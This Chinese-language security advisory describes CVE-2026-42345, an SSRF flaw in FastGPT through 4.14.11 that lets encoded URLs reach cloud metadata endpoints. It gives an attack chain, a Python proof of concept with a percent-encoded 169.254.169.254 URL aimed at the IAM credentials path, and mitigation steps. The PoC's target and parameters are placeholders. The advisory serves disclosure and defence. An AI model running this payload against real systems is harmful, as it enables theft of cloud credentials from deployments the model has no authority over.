CVE-2026-42345 FastGPT 元数据端点SSRF漏洞

漏洞信息

漏洞编号

CVE-2026-42345

漏洞类型

服务器端请求伪造 (SSRF)

CVSS评分

7.7 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

FastGPT

漏洞概述

FastGPT 4.14.11及之前版本存在严重的安全漏洞。由于isInternalAddress()函数仅通过简单的字符串前缀匹配来拦截云元数据端点，且默认未启用私有IP检查，攻击者可以利用多种URL编码技巧绕过该限制。这导致未经授权的内部网络访问，特别是云服务元数据端点，造成敏感信息泄露风险。

技术细节

该漏洞的核心在于FastGPT的packages/service/common/system/utils.ts文件中的isInternalAddress()函数。该函数试图通过硬编码列表和fullUrl.startsWith()检查来阻止对云元数据服务（如AWS、阿里云等169.254.169.254）的访问。然而，这种检查机制非常脆弱，攻击者可以使用至少7种不同的URL编码方式（例如双重编码、Unicode编码等）构造恶意请求。这些编码后的URL在解析后会指向相同的元数据服务，但能成功绕过字符串匹配检查。此外，由于配置项CHECK_INTERNAL_IP默认值为false（非true），导致更广泛的私有IP范围校验（isInternalIPv4/isInternalIPv6）处于关闭状态。因此，攻击者无需特殊权限即可利用此缺陷，探测并获取云主机的元数据凭证。

攻击链分析

STEP 1

侦察

攻击者识别出目标使用的FastGPT版本为4.14.11或更早版本。

STEP 2

构造载荷

攻击者构造针对云元数据端点（169.254.169.254）的URL，并使用URL编码技术对IP地址进行编码，以绕过字符串匹配检查。

STEP 3

发送请求

攻击者向FastGPT的API接口发送包含恶意URL的请求。

STEP 4

绕过防护

由于isInternalAddress()只检查字符串前缀且CHECK_INTERNAL_IP为false，编码后的URL成功绕过检测，服务器侧向元数据服务发起请求。

STEP 5

获取数据

FastGPT服务器返回云元数据中的敏感信息（如IAM临时凭证），导致数据泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target: Vulnerable FastGPT instance endpoint (Hypothetical)
target = "http://vulnerable-fastgpt-instance/api/chat"

# Bypass technique: URL encoding the Cloud Metadata IP
# 169.254.169.254 encoded as %31%36%39%2E%32%35%34%2E%31%36%39%2E%32%35%34
bypass_url = "http://%31%36%39%2E%32%35%34%2E%31%36%39%2E%32%35%34/latest/meta-data/iam/security-credentials/"

payload = {
    "url": bypass_url,
    "other_params": "..."
}

try:
    response = requests.post(target, json=payload)
    if response.status_code == 200:
        print("[+] Potential SSRF successful!")
        print(f"[+] Response: {response.text[:200]}")
    else:
        print(f"[-] Request failed with status: {response.status_code}")
except Exception as e:
    print(f"[-] Error: {e}")

影响范围

FastGPT <= 4.14.11

防御指南

临时缓解措施

建议立即在FastGPT配置中将CHECK_INTERNAL_IP设置为true，以启用严格的内网IP校验机制。同时，应在云主机安全组或网络ACL中，限制实例对元数据服务IP地址（169.254.169.254）的访问，防止SSRF攻击窃取凭证。